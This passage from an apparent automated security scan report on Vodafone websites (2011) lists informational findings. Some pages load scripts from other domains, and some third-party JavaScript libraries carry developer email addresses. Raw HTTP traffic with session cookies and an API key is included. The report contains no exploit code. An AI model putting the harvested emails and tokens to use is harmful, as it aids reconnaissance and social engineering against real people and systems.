9.15. http://forum.vodafone.co.uk/t5/Vodafone-Sure-Signal/bd-p/70 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://forum.vodafone.co.uk
Path:	/t5/Vodafone-Sure-Signal/bd-p/70

Issue detail

The response dynamically includes the following scripts from other domains:

http://connect.facebook.net/en_US/all.js
http://vodafoneuk.i.lithium.com/t5/scripts/0FFDFD01A03AA87ABAC1D623C7586B4B/lia-scripts-head-min.js
http://vodafoneuk.i.lithium.com/t5/scripts/5B16DF6CBE23F9D6A69BBB5A4BB6B299/lia-scripts-body-min.js
http://vodafoneuk.i.lithium.com/t5/scripts/BF02D75348A85A413B541ED547F88F2B/lia-scripts-common-min.js
https://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js

Request

GET /t5/Vodafone-Sure-Signal/bd-p/70 HTTP/1.1
Host: forum.vodafone.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 18 Nov 2011 18:42:05 GMT
Server: Apache
Set-Cookie: LiSESSIONID=7A95ADABF20C27FB3E4FAE7435D6141F; Path=/; HttpOnly
Set-Cookie: LithiumUserInfo=""; Domain=.vodafone.co.uk; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: LithiumUserSecure=""; Domain=.vodafone.co.uk; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 251092

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>


       <link class="lia-link
...[SNIP]...
<link rel="shortcut icon" href="/html/assets/favicon.ico" type="image/x-icon">
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js"></script>
...[SNIP]...
</style>

<script type="text/javascript" src="http://vodafoneuk.i.lithium.com/t5/scripts/0FFDFD01A03AA87ABAC1D623C7586B4B/lia-scripts-head-min.js"></script>
...[SNIP]...
</div><script type="text/javascript" src="http://vodafoneuk.i.lithium.com/t5/scripts/BF02D75348A85A413B541ED547F88F2B/lia-scripts-common-min.js"></script><script type="text/javascript" src="http://connect.facebook.net/en_US/all.js"></script><script type="text/javascript" src="http://vodafoneuk.i.lithium.com/t5/scripts/5B16DF6CBE23F9D6A69BBB5A4BB6B299/lia-scripts-body-min.js"></script>
...[SNIP]...

9.16. https://freesim.vodafone.co.uk/orders/add previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://freesim.vodafone.co.uk
Path:	/orders/add

Issue detail

The response dynamically includes the following scripts from other domains:

https://ajax.googleapis.com/ajax/libs/jquery/1.5.2/jquery.min.js
https://c411930.ssl.cf3.rackcdn.com/js/lib/fancybox/jquery.fancybox-1.3.4.pack.js
https://c411930.ssl.cf3.rackcdn.com/js/lib/modernizr-1.6.min.js
https://c411930.ssl.cf3.rackcdn.com/js/vodafone.lib_validator_orders_countries.min.js
https://c411930.ssl.cf3.rackcdn.com/js/vodafone.lightbox.js

Request

GET /orders/add HTTP/1.1
Host: freesim.vodafone.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 18 Nov 2011 18:42:08 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.3.8
Set-Cookie: ci_csrf_token=914421352fdf38872d27610e72d9310e; expires=Fri, 18-Nov-2011 20:42:08 GMT; path=/
Set-Cookie: ci_session=a%3A4%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%223fd40005a122b4f5d4ab8ccc0ff9cc7e%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A13%3A%2250.23.123.106%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A50%3A%22Mozilla%2F4.0+%28compatible%3B+MSIE+7.0%3B+Windows+NT+6.0%29%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1321641728%3B%7D58e568a9ede150a6f74148acb75e1106; expires=Fri, 18-Nov-2011 19:42:08 GMT; path=/
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 18846

<!DOCTYPE html>


<!--[if IE 8 ]> <html lang="en" class="no-js ie
...[SNIP]...
<link rel="stylesheet" media="all" href="https://c411930.ssl.cf3.rackcdn.com/css/screen.css" />

<script src="https://c411930.ssl.cf3.rackcdn.com/js/lib/modernizr-1.6.min.js"></script>
<script src="//ajax.googleapis.com/ajax/libs/jquery/1.5.2/jquery.min.js"></script>
...[SNIP]...
</script>

<script src="https://c411930.ssl.cf3.rackcdn.com/js/lib/fancybox/jquery.fancybox-1.3.4.pack.js"></script>
<script src="https://c411930.ssl.cf3.rackcdn.com/js/vodafone.lib_validator_orders_countries.min.js"></script>
<script src="https://c411930.ssl.cf3.rackcdn.com/js/vodafone.lightbox.js"></script>
...[SNIP]...

9.17. https://freesim.vodafone.co.uk/packages/index previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://freesim.vodafone.co.uk
Path:	/packages/index

Issue detail

The response dynamically includes the following scripts from other domains:

https://ajax.googleapis.com/ajax/libs/jquery/1.5.2/jquery.min.js
https://c411930.ssl.cf3.rackcdn.com/js/lib/modernizr-1.6.min.js
https://c411930.ssl.cf3.rackcdn.com/js/vodafone.lib.min.js

Request

Response

9.18. http://help.vodafone.co.uk/system/selfservice.controller previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://help.vodafone.co.uk
Path:	/system/selfservice.controller

Issue detail

The response dynamically includes the following script from another domain:

http://www.google.com/jsapi?key=ABQIAAAAj__kJ6aaO3s5ijjGn0zvPRSbWc6EXbZAWA482RqwSy1mqMtZXBRE4G4BLD229jpU7eZwEijNhP_qVw

Request

Response

9.19. https://help.vodafone.co.uk/system/selfservice.controller previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://help.vodafone.co.uk
Path:	/system/selfservice.controller

Issue detail

The response dynamically includes the following script from another domain:

https://j.clickdensity.com/cr.js

Request

Response

10. Email addresses disclosed previous next
There are 11 instances of this issue:

http://enterprise.vodafone.com/global/js/carousels/carousellite.js
http://enterprise.vodafone.com/global/js/flowplayer/flowplayer.controls-3.0.2.js
http://enterprise.vodafone.com/global/js/flowplayer/flowplayer.ipad-3.2.2.min.js
http://enterprise.vodafone.com/global/js/flowplayer/jquery.pngFix.pack.js
http://enterprise.vodafone.com/global/js/jQuery/1.3.2/plugin/jquery.dimensions.js
http://enterprise.vodafone.com/global/js/s_code.js
http://forum.vodafone.co.uk/
http://help.vodafone.co.uk/system/web/view/selfservice/templates/vodafone/js/jcarousellite.js
http://help.vodafone.co.uk/system/web/view/selfservice/templates/vodafone/mozInsertAdjacent.js
https://help.vodafone.co.uk/system/web/view/selfservice/templates/vodafone/js/jcarousellite.js
https://help.vodafone.co.uk/system/web/view/selfservice/templates/vodafone/mozInsertAdjacent.js

Issue background

The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content.

However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organisation's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.

Issue remediation

You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).

10.1. http://enterprise.vodafone.com/global/js/carousels/carousellite.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://enterprise.vodafone.com
Path:	/global/js/carousels/carousellite.js

Issue detail

The following email address was disclosed in the response:

ganeshread@gmail.com

Request

GET /global/js/carousels/carousellite.js HTTP/1.1
Host: enterprise.vodafone.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: */*
Referer: http://enterprise.vodafone.com/products_solutions/industry/financial-services.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_fv=flash%2011; s_p7=flash%2011; JSESSIONID=abcm6Z7u519qTfa0K73ot; __utma=112384592.1735394827.1321640817.1321640817.1321640817.1; __utmc=112384592; __utmz=112384592.1321640817.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_lastvisit=1321640816999; sc_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vi=[CS]v1|276351BB051D181F-6000010340001B89[CE]; __utmb=112384592; s_cc=true; s_nr=1321640849543; s_sq=vodafonegroupvgeprod%3D%2526pid%253Dinsight_news%25253A2011-11-04-fixed-mobile-convergence%2525u2013the-first-step-in-a-unified-communications-strategy%2526pidt%253D1%2526oid%253Dhttp%25253A//enterprise.vodafone.com/products_solutions/industry/financial-services.jsp%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Fri, 18 Nov 2011 18:27:38 GMT
Server: Apache
ETag: "FkTyoNOEEY0"
Last-Modified: Fri, 03 Sep 2010 20:51:49 GMT
Accept-Ranges: bytes
Cache-Control: max-age=7200
Expires: Fri, 18 Nov 2011 20:27:38 GMT
Content-Length: 14525
Content-Type: application/x-javascript

/**

* jCarouselLite - jQuery plugin to navigate images/any content in a carousel style widget.

* @requires jQuery v1.2 or above

*

* http://gmarwaha.com/jquery/jcarousellite/

*

* Copyright
...[SNIP]...
llbacks. The functions will be passed an argument that represents an array of elements that

* are visible at the time of callback.

*

*

* @cat Plugins/Image Gallery

* @author Ganeshji Marwaha/ganeshread@gmail.com

*/

(function(jQuery) { // Compliant with jquery.noConflict()

jQuery.fn.jCarouselLite = function(o) {

o = jQuery.extend({

btnPrev: null,

...[SNIP]...

10.2. http://enterprise.vodafone.com/global/js/flowplayer/flowplayer.controls-3.0.2.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://enterprise.vodafone.com
Path:	/global/js/flowplayer/flowplayer.controls-3.0.2.js

Issue detail

The following email address was disclosed in the response:

support@flowplayer.org

Request

GET /global/js/flowplayer/flowplayer.controls-3.0.2.js HTTP/1.1
Host: enterprise.vodafone.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: */*
Referer: http://enterprise.vodafone.com/insight_news/2011-11-04-fixed-mobile-convergence%E2%80%93the-first-step-in-a-unified-communications-strategy.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_fv=flash%2011; s_p7=flash%2011; JSESSIONID=abcm6Z7u519qTfa0K73ot; __utma=112384592.1735394827.1321640817.1321640817.1321640817.1; __utmb=112384592; __utmc=112384592; __utmz=112384592.1321640817.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_cc=true; s_lastvisit=1321640816999; sc_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vi=[CS]v1|276351BB051D181F-6000010340001B89[CE]; s_nr=1321640829806; s_sq=vodafonegroupvgeprod%3D%2526pid%253Dhome%25253Aindex%2526pidt%253D1%2526oid%253Dhttp%25253A//enterprise.vodafone.com/insight_news/2011-11-04-fixed-mobile-convergence%252525E2%25252580%25252593the-first-st%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Fri, 18 Nov 2011 18:27:19 GMT
Server: Apache
ETag: "7/5DkT80yKO"
Last-Modified: Fri, 03 Sep 2010 20:51:49 GMT
Accept-Ranges: bytes
Cache-Control: max-age=7200
Expires: Fri, 18 Nov 2011 20:27:18 GMT
Content-Length: 6576
Content-Type: application/x-javascript

/**
* flowplayer.controls.js 3.0.2. Flowplayer JavaScript plugin.
*
* This file is part of Flowplayer, http://flowplayer.org
*
* Author: Tero Piirainen, <support@flowplayer.org>
* Copyright (c)
...[SNIP]...

10.3. http://enterprise.vodafone.com/global/js/flowplayer/flowplayer.ipad-3.2.2.min.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://enterprise.vodafone.com
Path:	/global/js/flowplayer/flowplayer.ipad-3.2.2.min.js

Issue detail

The following email address was disclosed in the response:

thomas@flowplayer.org

Request

GET /global/js/flowplayer/flowplayer.ipad-3.2.2.min.js HTTP/1.1
Host: enterprise.vodafone.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: */*
Referer: http://enterprise.vodafone.com/home/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_fv=flash%2011; s_cc=true; s_p7=flash%2011; s_nr=1321640796558; s_sq=%5B%5BB%5D%5D; JSESSIONID=abcm6Z7u519qTfa0K73ot

Response

HTTP/1.1 200 OK
Date: Fri, 18 Nov 2011 18:26:58 GMT
Server: Apache
ETag: "EDUsPC4v96L"
Last-Modified: Thu, 16 Jun 2011 16:49:46 GMT
Accept-Ranges: bytes
Cache-Control: max-age=7200
Expires: Fri, 18 Nov 2011 20:26:57 GMT
Content-Length: 11633
Content-Type: application/x-javascript

/*
* ipad.js 3.2.2. The Flowplayer ipad/iphone fallback.
*
* Copyright 2010, 2011 Flowplayer Oy
* By Thomas Dubois <thomas@flowplayer.org>
*
* This file is part of Flowplayer.
*
* Flowplayer i
...[SNIP]...

10.4. http://enterprise.vodafone.com/global/js/flowplayer/jquery.pngFix.pack.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://enterprise.vodafone.com
Path:	/global/js/flowplayer/jquery.pngFix.pack.js

Issue detail

The following email address was disclosed in the response:

andreas.eberhard@gmail.com

Request

GET /global/js/flowplayer/jquery.pngFix.pack.js HTTP/1.1
Host: enterprise.vodafone.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: */*
Referer: http://enterprise.vodafone.com/home/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_fv=flash%2011; s_cc=true; s_p7=flash%2011; s_nr=1321640796558; s_sq=%5B%5BB%5D%5D; JSESSIONID=abcm6Z7u519qTfa0K73ot

Response

HTTP/1.1 200 OK
Date: Fri, 18 Nov 2011 18:26:58 GMT
Server: Apache
ETag: "H/PEociBJgM"
Last-Modified: Fri, 03 Sep 2010 20:51:49 GMT
Accept-Ranges: bytes
Cache-Control: max-age=7200
Expires: Fri, 18 Nov 2011 20:26:57 GMT
Content-Length: 2495
Content-Type: application/x-javascript

/**
* --------------------------------------------------------------------
* jQuery-Plugin "pngFix"
* Version: 1.1, 11.09.2007
* by Andreas Eberhard, andreas.eberhard@gmail.com
* http://jquery.andreaseberhard.de/
*
* Copyright (c) 2007 Andreas Eberhard
* Licensed under GPL (http://www.opensource.org/licenses/gpl-license.php)
*/
eval(function(p
...[SNIP]...

10.5. http://enterprise.vodafone.com/global/js/jQuery/1.3.2/plugin/jquery.dimensions.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://enterprise.vodafone.com
Path:	/global/js/jQuery/1.3.2/plugin/jquery.dimensions.js

Issue detail

The following email addresses were disclosed in the response:

brandon.aaron@gmail.com
paul.bakaus@googlemail.com

Request

GET /global/js/jQuery/1.3.2/plugin/jquery.dimensions.js HTTP/1.1
Host: enterprise.vodafone.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: */*
Referer: http://enterprise.vodafone.com/insight_news/2011-11-04-fixed-mobile-convergence%E2%80%93the-first-step-in-a-unified-communications-strategy.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_fv=flash%2011; s_p7=flash%2011; JSESSIONID=abcm6Z7u519qTfa0K73ot; __utma=112384592.1735394827.1321640817.1321640817.1321640817.1; __utmb=112384592; __utmc=112384592; __utmz=112384592.1321640817.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_cc=true; s_lastvisit=1321640816999; sc_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vi=[CS]v1|276351BB051D181F-6000010340001B89[CE]; s_nr=1321640829806; s_sq=vodafonegroupvgeprod%3D%2526pid%253Dhome%25253Aindex%2526pidt%253D1%2526oid%253Dhttp%25253A//enterprise.vodafone.com/insight_news/2011-11-04-fixed-mobile-convergence%252525E2%25252580%25252593the-first-st%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Fri, 18 Nov 2011 18:27:18 GMT
Server: Apache
ETag: "5/n1jkJL5PF"
Last-Modified: Sun, 26 Sep 2010 19:10:05 GMT
Accept-Ranges: bytes
Cache-Control: max-age=7200
Expires: Fri, 18 Nov 2011 20:27:17 GMT
Content-Length: 3442
Content-Type: application/x-javascript

/* Copyright (c) 2007 Paul Bakaus (paul.bakaus@googlemail.com) and Brandon Aaron (brandon.aaron@gmail.com || http://brandonaaron.net)
* Dual licensed under the MIT (http://www.opensource.org/licenses/mit-license.php)
* and GPL (http://www.opensource.org/licenses/gpl-license.php) licenses.
*
* $LastCha
...[SNIP]...

10.6. http://enterprise.vodafone.com/global/js/s_code.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://enterprise.vodafone.com
Path:	/global/js/s_code.js

Issue detail

The following email addresses were disclosed in the response:

id@Vs.tc
jeroen@adversiment.nl

Request

GET /global/js/s_code.js HTTP/1.1
Host: enterprise.vodafone.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: */*
Referer: http://enterprise.vodafone.com/home/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_fv=flash%2011; s_cc=true; s_p7=flash%2011; s_nr=1321640796558; s_sq=%5B%5BB%5D%5D; JSESSIONID=abcm6Z7u519qTfa0K73ot

Response

HTTP/1.1 200 OK
Date: Fri, 18 Nov 2011 18:27:00 GMT
Server: Apache
ETag: "EFFK4zwEkLA"
Last-Modified: Fri, 07 Jan 2011 06:53:03 GMT
Accept-Ranges: bytes
Cache-Control: max-age=7200
Expires: Fri, 18 Nov 2011 20:27:00 GMT
Content-Length: 40900
Content-Type: application/x-javascript

/* -------------------------------
Last update
- Mediatracking update
By jeroen@adversiment.nl
------------------------------- */
var s_version="H20.3-VGE20100527"

/* SiteCatalyst code version: H.20.3.
Copyright 1997-2009 Omniture, Inc. More info available at
http://www.omniture.com */

...[SNIP]...
=s.mr($C,(vt@tt`Zvt)`fs.hav()+q+(qs?qs:s.rq(^5)),0,id,ta);qs`g;"
+"`Rm('t')`5s.p_r)s.p_r(`I`a`g}^I(qs);^Q`u($3;`j$3`c^1,`G$O1',vb`I@M=^G=s.`Q`r=s.`Q^2=`H`m`g`5s.pg)`H^w@M=`H^weo=`H^w`Q`r=`H^w`Q^2`g`5!id@Vs.tc^ztc=1;s.flush`U()}`4#7`Ctl`0o,t,n,vo`2;s.@M=$Go`I`Q^2=t"
+";s.`Q`r=n;s.t($3}`5pg){`H^wco`0o){`P^s\"_\",1,$8`4$Go)`Cwd^wgs`0u@v`P^sun,1,$8`4s.t()`Cwd^wdc`0u@v`P^sun,$8`4s.t()}}@8=(`H`M`k`9`3'@Os^y0`Id
...[SNIP]...

10.7. http://forum.vodafone.co.uk/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://forum.vodafone.co.uk
Path:	/

Issue detail

The following email address was disclosed in the response:

vodafone-eforum@vodafone.co.uk

Request

GET / HTTP/1.1
Host: forum.vodafone.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

10.8. http://help.vodafone.co.uk/system/web/view/selfservice/templates/vodafone/js/jcarousellite.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://help.vodafone.co.uk
Path:	/system/web/view/selfservice/templates/vodafone/js/jcarousellite.js

Issue detail

The following email address was disclosed in the response:

ganeshread@gmail.com

Request

GET /system/web/view/selfservice/templates/vodafone/js/jcarousellite.js HTTP/1.1
Host: help.vodafone.co.uk
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: */*
Referer: http://help.vodafone.co.uk/system/selfservice.controller?CMD=STARTPAGEFRAMELESS&CONFIGURATION=1058&PARTITION_ID=1&USERTYPE=1&LANGUAGE=en&COUNTRY=US&TIMEZONE_OFFSET=-3600000
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2763522B851D1864-60000107601A8EC3[CE]; mbox=session#1321641039287-389573#1321643548|PC#1321641039287-389573.19#1322851288|check#true#1321641748; s_pers=%20s_lastvisit%3D1321641041755%7C1416249041755%3B%20s_vnum%3D1324233041761%2526vn%253D1%7C1324233041761%3B%20dl%3D1%7C1321643488458%3B%20s_nr%3D1321641688464%7C1324233688464%3B%20s_invisit%3Dtrue%7C1321643488482%3B%20gpv_p32%3DUK%253ABrands%253AiPhone%253APaymonthlyiPhone%7C1321643488487%3B; s_sv_122_s1=1@16@a//1321641043212; s_sv_122_p1=1@49@d/25246/25245/25244/25243&s/25247/19337/26945&e/9; s_sess=%20s_sv_sid%3D709713783754%3B%20ev1%3Dg3%2520internet%2520web%2520surfing%3B%20s_scount%3D2%3B%20s_stack%3D1%253Apress%2520relese%2520contact%257C2%253Ag3%2520internet%2520web%2520surfing%3B%20s_cc%3Dtrue%3B%20s_cmrun%3D1%3B%20s_sq%3D%3B%20s_ppv%3D50%3B; eGain_eService_JSESSIONID=5r21TGnQkQwnXlP6wnYsGVnVnhH7JQS4Cp4sGK5sqGD3YHm0yKL8!-1484610483; web_templates_personalization_cookie#1058#1=; BIGipServerpool_ems00820ss=721422602.20480.0000

Response

HTTP/1.1 200 OK
Cache-Control: max-age=31536000
Content-Length: 13903
Content-Type: application/octet-stream
Last-Modified: Mon, 18 Apr 2011 08:57:00 GMT
Accept-Ranges: bytes
ETag: "0d6594a6fdcb1:1191"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Fri, 18 Nov 2011 18:42:38 GMT

/**
* jCarouselLite - jQuery plugin to navigate images/any content in a carousel style widget.
* @requires jQuery v1.2 or above
*
* http://gmarwaha.com/jquery/jcarousellite/
*
* Copyright (c) 20
...[SNIP]...
2 callbacks. The functions will be passed an argument that represents an array of elements that
* are visible at the time of callback.
*
*
* @cat Plugins/Image Gallery
* @author Ganeshji Marwaha/ganeshread@gmail.com
*/

(function($) { // Compliant with jquery.noConflict()
$.fn.jCarouselLite = function(o) {
o = $.extend({
btnPrev: null,
btnNext: null,

...[SNIP]...

10.9. http://help.vodafone.co.uk/system/web/view/selfservice/templates/vodafone/mozInsertAdjacent.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://help.vodafone.co.uk
Path:	/system/web/view/selfservice/templates/vodafone/mozInsertAdjacent.js

Issue detail

The following email address was disclosed in the response:

me@jscript.dk

Request

GET /system/web/view/selfservice/templates/vodafone/mozInsertAdjacent.js HTTP/1.1
Host: help.vodafone.co.uk
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: */*
Referer: http://help.vodafone.co.uk/system/selfservice.controller?CMD=STARTPAGEFRAMELESS&CONFIGURATION=1058&PARTITION_ID=1&USERTYPE=1&LANGUAGE=en&COUNTRY=US&TIMEZONE_OFFSET=-3600000
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2763522B851D1864-60000107601A8EC3[CE]; mbox=session#1321641039287-389573#1321643548|PC#1321641039287-389573.19#1322851288|check#true#1321641748; s_pers=%20s_lastvisit%3D1321641041755%7C1416249041755%3B%20s_vnum%3D1324233041761%2526vn%253D1%7C1324233041761%3B%20dl%3D1%7C1321643488458%3B%20s_nr%3D1321641688464%7C1324233688464%3B%20s_invisit%3Dtrue%7C1321643488482%3B%20gpv_p32%3DUK%253ABrands%253AiPhone%253APaymonthlyiPhone%7C1321643488487%3B; s_sv_122_s1=1@16@a//1321641043212; s_sv_122_p1=1@49@d/25246/25245/25244/25243&s/25247/19337/26945&e/9; s_sess=%20s_sv_sid%3D709713783754%3B%20ev1%3Dg3%2520internet%2520web%2520surfing%3B%20s_scount%3D2%3B%20s_stack%3D1%253Apress%2520relese%2520contact%257C2%253Ag3%2520internet%2520web%2520surfing%3B%20s_cc%3Dtrue%3B%20s_cmrun%3D1%3B%20s_sq%3D%3B%20s_ppv%3D50%3B; eGain_eService_JSESSIONID=5r21TGnQkQwnXlP6wnYsGVnVnhH7JQS4Cp4sGK5sqGD3YHm0yKL8!-1484610483; web_templates_personalization_cookie#1058#1=; BIGipServerpool_ems00820ss=721422602.20480.0000

Response

HTTP/1.1 200 OK
Cache-Control: max-age=31536000
Content-Length: 1382
Content-Type: application/octet-stream
Last-Modified: Tue, 06 May 2008 09:26:19 GMT
Accept-Ranges: bytes
ETag: "802f933d5bafc81:1191"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Fri, 18 Nov 2011 18:42:39 GMT

// insertAdjacentHTML(), insertAdjacentText() and insertAdjacentElement()
// for Netscape 6/Mozilla by Thor Larholm me@jscript.dk
// Usage: include this code segment at the beginning of your document
// before any other Javascript contents.

if(typeof HTMLElement!="undefined" && !
HTMLElement.prototype.insertAdjacentEleme
...[SNIP]...

10.10. https://help.vodafone.co.uk/system/web/view/selfservice/templates/vodafone/js/jcarousellite.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://help.vodafone.co.uk
Path:	/system/web/view/selfservice/templates/vodafone/js/jcarousellite.js

Issue detail

The following email address was disclosed in the response:

ganeshread@gmail.com

Request

Response

HTTP/1.1 200 OK
Cache-Control: max-age=31536000
Content-Length: 13903
Content-Type: application/octet-stream
Last-Modified: Mon, 18 Apr 2011 08:57:00 GMT
Accept-Ranges: bytes
ETag: "0d6594a6fdcb1:1249"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Fri, 18 Nov 2011 19:06:40 GMT
Set-Cookie: BIGipServerpool_ems00820ss=671090954.20480.0000; path=/

/**
* jCarouselLite - jQuery plugin to navigate images/any content in a carousel style widget.
* @requires jQuery v1.2 or above
*
* http://gmarwaha.com/jquery/jcarousellite/
*
* Copyright (c) 20
...[SNIP]...
2 callbacks. The functions will be passed an argument that represents an array of elements that
* are visible at the time of callback.
*
*
* @cat Plugins/Image Gallery
* @author Ganeshji Marwaha/ganeshread@gmail.com
*/

(function($) { // Compliant with jquery.noConflict()
$.fn.jCarouselLite = function(o) {
o = $.extend({
btnPrev: null,
btnNext: null,

...[SNIP]...

10.11. https://help.vodafone.co.uk/system/web/view/selfservice/templates/vodafone/mozInsertAdjacent.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://help.vodafone.co.uk
Path:	/system/web/view/selfservice/templates/vodafone/mozInsertAdjacent.js

Issue detail

The following email address was disclosed in the response:

me@jscript.dk

Request

GET /system/web/view/selfservice/templates/vodafone/mozInsertAdjacent.js HTTP/1.1
Host: help.vodafone.co.uk
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://help.vodafone.co.uk/system/selfservice.controller?CMD=BROWSE_TOPIC&CMD2=contactus&CMD3=business&PARTITION_ID=1&CONFIGURATION=1000
